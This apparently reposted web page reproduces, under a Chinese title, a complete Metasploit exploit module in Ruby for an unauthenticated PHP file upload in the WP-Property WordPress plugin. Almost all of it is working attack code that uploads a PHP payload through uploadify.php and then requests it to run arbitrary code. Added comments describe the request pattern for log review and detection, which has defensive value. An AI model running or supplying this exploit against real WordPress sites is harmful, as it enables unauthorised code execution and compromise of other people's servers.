WordPress WP-Property PHP 文件上传漏洞
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/exploit/php_exe'

# Metasploit remote exploit module for the unauthenticated file upload in the
# WP-Property WordPress plugin (affected: <= 1.35.0, per the module description).
#
# Request pattern this module produces, as visible in the code below (useful
# when reviewing web server logs or writing a detection rule):
#   1. a multipart/form-data POST to
#      <TARGETURI>/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php
#      with a "Filedata" part whose filename is five random letters plus ".php"
#      and a "folder" part naming the uploadify directory;
#   2. a GET for whatever path the server returned in the POST response body.
#
# NOTE(review): the page names the affected versions but not a fixed release;
# confirm the patched version against the vendor advisory before relying on a
# version comparison.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Registers module metadata (name, references, targets, payload constraints)
  # and the TARGETURI option, which defaults to '/wordpress'.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Probes for the uploadify endpoint with a single GET.
  #
  # Returns CheckCode::Unknown when there is no response or the status is not
  # 200, and CheckCode::Appears otherwise. The response body and the plugin
  # version are never inspected, so "Appears" only means the script is
  # reachable; a patched or access-restricted install that still answers 200
  # would be reported the same way.
  def check
    uri = target_uri.path
    # Appends to the string returned by target_uri.path in place.
    uri << '/' unless uri.end_with?('/')

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    return Exploit::CheckCode::Unknown unless res && res.code == 200

    Exploit::CheckCode::Appears
  end

  # Uploads the payload through uploadify.php, then requests the returned path.
  #
  # Aborts through fail_with (UnexpectedReply) when the upload response is
  # missing, is not a 200, or does not echo the generated filename.
  def exploit
    uri = target_uri.path
    uri << '/' unless uri.end_with?('/')

    peer = "#{rhost}:#{rport}"
    uploadify_dir = "#{uri}wp-content/plugins/wp-property/third-party/uploadify/"

    @payload_name = "#{rand_text_alpha(5)}.php"
    # Helper from the PhpEXE mixin; presumably the generated stub removes
    # itself after running (unlink_self) -- confirm in the mixin.
    php_payload = get_write_exec_payload(:unlink_self => true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part(uploadify_dir, nil, nil, "form-data; name=\"folder\"")
    # Drops the CRLF that precedes a "--_Part_" boundary at the start of a line.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uploadify_dir}uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    unless res && res.code == 200 && res.body =~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The endpoint's response body is used verbatim as the path to request.
    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end
不要问我这写的是什么 怎么利用 我是说msf.